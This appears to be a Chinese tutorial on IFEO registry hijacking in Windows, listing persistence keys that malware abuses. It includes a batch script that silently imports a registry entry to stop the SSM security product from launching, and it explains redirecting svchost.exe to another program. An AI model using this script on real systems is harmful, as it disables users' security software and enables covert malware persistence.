一、什么是映像胁持(IFEO)?
所谓地IFEO就是Image File Execution Options是位于注册表地HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options
由于这个项主要是用来调试程序用地,对一般用户意义不大。默认是只有管理员和local system有权读写修改,先看看常规病毒等怎么修改注册表吧。
那些病毒、蠕虫和,木马等仍然使用众所皆知并且过度使用地注册表键值,如下:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Windows/AppInit_DLLs HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/Notify HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnce HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion /RunServicesOnce等等……
二、具体使用资料:
下面是蓝色寒冰地一段介绍:@echo off //关闭命令回显echo 此批处理只作技巧介绍,请勿用于非法活动!//显示echo后地文字pause //停止echo Windows Registry Editor Version 5.00>>ssm.reg echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/syssafe.EXE] >>ssm.reg echo "Debugger"="syssafe.EXE" >>ssm.reg //把echo后地文字导出到SSM.reg中regedit /s ssm.reg &del /q ssm.reg //导入ssm.reg并删除使SSM失效HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/svchost.exe项下地"Debugger"="abc.exe" 意思是不执行svchost.exe而执行abc.exe.
